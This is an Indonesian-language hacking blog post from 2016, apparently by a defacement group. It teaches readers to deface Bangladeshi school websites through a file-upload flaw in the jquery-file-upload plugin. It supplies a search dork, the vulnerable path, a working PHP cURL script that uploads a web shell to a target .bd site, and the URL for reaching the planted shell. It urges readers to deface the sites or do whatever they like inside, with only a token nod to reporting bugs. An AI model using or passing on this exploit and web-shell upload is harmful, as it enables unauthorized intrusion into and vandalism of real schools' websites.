Sunday, 1 May 2016

Deface website sekolah Bangladesh


Hello World ; Pagi Fans, Please Say Hello Haters :*
xixixhi, Nuenomaru disini. uih ini thread Pertama atau artikel pembukaan di Blog ini pada bulan Mei 2016 ^_^ dari ane :* *btw ibu ane ultah gengs :v pas bet tgl muda. *yehh lov u mom <3
yokaii, lanjut bahas ini thread, kali Ini Nue bakal Share Tutorial Deface website sekolah Bangladesh, Sebenernya sih ini Tutorial sama kok sama kek Jquery File Upload
yups ini bedanya gegara dorknya aja menjuru ke website Sekolahan .bd (bangladesh).
ya kyk bug balitbang lah kalo di indo.

Bugnya ada di plugin jquery-file-upload.


yaudah langsung aja.


Dork:
Developed by exdmania
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.

exploit: /assets/super_admin/vendor/jquery-file-upload/server/php/


3. Vulnerability ~ sama deh kek Jquery


udh gak verawan, bnyak bet yang gangbang :'(

4. Buat File Baru Berekstensi .php Contoh ven.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn ven.php tadi

<?php
$file = "shelllo.php"; //shell ataupun script deface
$post = array("files[]" => "@$file",
      );
     $ch2 = curl_init ("www.target.bd/assets/super_admin/vendor/jquery-file-upload/server/php/");
     curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
     curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
     curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
     curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
     curl_setopt ($ch2, CURLOPT_POST, 1);
     curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
     $data = curl_exec ($ch2);
     echo $data."\n\n\n";
     ?>

5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php

7. jika sukses , akan muncul nama shell sobat di CMD,dan akan terlihat seperti di SS.


8. Shell Akses: www.target.bd/assets/super_admin/vendor/jquery-file-upload/server/php/files/

Done~ Ganteng Ganteng #SWAG akwkawk


Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))
*Hargai karya webmaster, kalo bisa bantu report Bug ke adminnya, atau bantu patch dgn seikhlas anda*
#Ganteng2PercumaKaloGakPunyaIman :* awkkawkwa



Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

Baca juga Jquery File Upload

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Defaced~
Sekian dan semoga bermanfaat .. terimakasih


source and thanks toindoXploit



./Nuenomaru




Hei apa kabar mu jauh disana :'D














Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2


EmoticonEmoticon